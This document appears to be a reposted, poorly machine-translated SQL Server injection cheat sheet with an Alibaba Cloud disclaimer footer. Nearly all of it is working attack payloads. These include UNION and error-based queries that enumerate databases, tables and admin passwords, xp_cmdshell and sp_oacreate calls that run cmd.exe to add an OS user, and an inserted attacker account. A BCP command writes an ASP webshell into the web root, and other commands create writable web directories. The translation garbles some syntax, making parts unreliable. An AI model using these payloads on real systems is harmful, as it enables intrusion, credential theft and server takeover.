Some of the most important user names (existing in the default SQL database)
Public
Dbo
Guest (generally prohibited, or not authorized)
Db_sercurityadmin
Ab_dlladmin
Some default extensions
Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumkeys
Xp_regenumvalues
Xp_regread
Xp_regremovemultistring
Xp_regwrite
Xp_availablemedia Drive Related
Xp_dirtree Directory
XP_ENUMDSN ODBC connection
Xp_loginconfig Server security Mode information
Xp_makecab Create a compressed volume
Xp_ntsec_enumdomains Domain Information
Xp_terminate_process The terminal process, give a PID
For example:
Sp_addextendedproc ' Xp_webserver ', ' C:\temp\xp_foo.dll '
EXEC xp_webserver
Sp_dropextendedproc ' Xp_webserver '
BCP "SELECT * FROM Test". Foo "Queryout c:\inetpub\wwwroot\runcommand.asp
-c-slocalhost-usa-pfoobar
' GROUP by Users.id has 1=1-
' GROUP by Users.id, Users.username, Users.password, Users.privs have 1=1-
'; Insert into users values (666, ' attacker ', ' foobar ', 0xFFFF)-
Union select top 1 column_name from INFORMATION_SCHEMA. COLUMNS where table_name= ' logintable '-
Union select top 1 column_name from INFORMATION_SCHEMA. COLUMNS where table_name= ' logintable ' where column_name not in (' login_id ')-
Union select top 1 column_name from INFORMATION_SCHEMA. COLUMNS where table_name= ' logintable ' where column_name not in (' login_id ', ' login_name ')-
Union select top 1 login_name from logintable-
Union select top 1 password from logintable where login_name= ' Rahul '--
Construct statement: Query exists xp_cmdshell
' Union SELECT @ @version, 1,1,1--
and 1= (SELECT @ @VERSION)
and ' sa ' = (select System_user)
' Union select ret,1,1,1 from foo--
' Union Select min (username), 1,1,1 from users where username > ' A '-
' Union Select min (username), 1,1,1 from users where username > ' admin '-
' Union select password,1,1,1 from users where username = ' admin '--
and user_name () = ' dbo '
and 0<> (select USER_NAME ()-
; DECLARE @shell INT exec sp_oacreate ' Wscript.Shell ', @shell OUTPUT exec sp_oamethod @shell, ' run ', NULL, ' C:\WINNT\system32 \cmd.exe/c net user swap 5245886/add '
and 1= (SELECT COUNT (*) from master.dbo.sysobjects where
xtype = ' X ' and name = ' xp_cmdshell ')
; EXEC master.dbo.sp_addextendedproc ' xp_cmdshell ', ' Xplog70.dll '
1 = (%20select%20count (*)%20from%20master.dbo.sysobjects%20where%20xtype= ' x '%20and%20name= ' xp_cmdshell ')
and 1= (select Is_srvrolemember (' sysadmin ')) determines whether the SA permission
and 0<> (select top 1 paths from newtable)--Bauku Dafa
and 1= (select name from master.dbo.sysdatabases where dbid=7) obtains the library name (from 1 to 5 are system id,6 above can be judged)
Create a virtual directory E disk:
DECLARE @o int exec sp_oacreate ' Wscript.Shell ', @o out exec sp_OAMethod @o, ' run ', NULL, ' cscript.exe c:\inetpub\wwwroot\ Mkwebdir.vbs-w "Default Web Site"-V "E", "E:\"
Access properties: (with writing a webshell)
DECLARE @o int exec sp_oacreate ' Wscript.Shell ', @o out exec sp_OAMethod @o, ' run ', NULL, ' cscript.exe c:\inetpub\wwwroot\ Chaccess.vbs-a w3svc/1/root/e +browse '
and 0<> (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid = 7,8,9 in turn .... Get more database names
and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype= ' U ') bursts into a table assumed to be admin
and 0<> (select top 1 name from bbs.dbo.sysobjects where Xtype= ' U "and name Not in (' Admin ')) to get the other tables.
and 0<> (SELECT COUNT (*) from bbs.dbo.sysobjects where xtype= ' U ' and name= ' admin '
and uid> (str (ID)) The number of bursts to the UID is assumed to be 18779569 Uid=id
and 0<> (select top 1 name from Bbs.dbo.syscolumns where id=18779569) gets a field from admin, assuming user_id
and 0<> (select top 1 name from Bbs.dbo.syscolumns where id=18779569 and name does not
(' ID ',...)) To storm out the other fields.
and 0< (select user_id from BBS.dbo.admin where username>1)
You can get the user name in order to get the password .... Suppose there are fields such as user_id username, password, etc.
Show.asp?id=-1 Union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
Show.asp?id=-1 Union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(The Union statement is popular everywhere, and access works well.)
Bauku Special tips::%5c= ' or '/and ' modify%5 submit
and 0<> (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype= ' U ') gets the table name
and 0<> (select top 1 name from bbs.dbo.sysobjects where Xtype= ' U "and name not in (' address '))
and 0<> (SELECT COUNT (*) from bbs.dbo.sysobjects where xtype= ' U ' and name= ' admin ' and uid> (str (ID)) to determine the ID value
and 0<> (select top 1 name from BBS.dbo.syscolumns where id=773577794) all fields
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.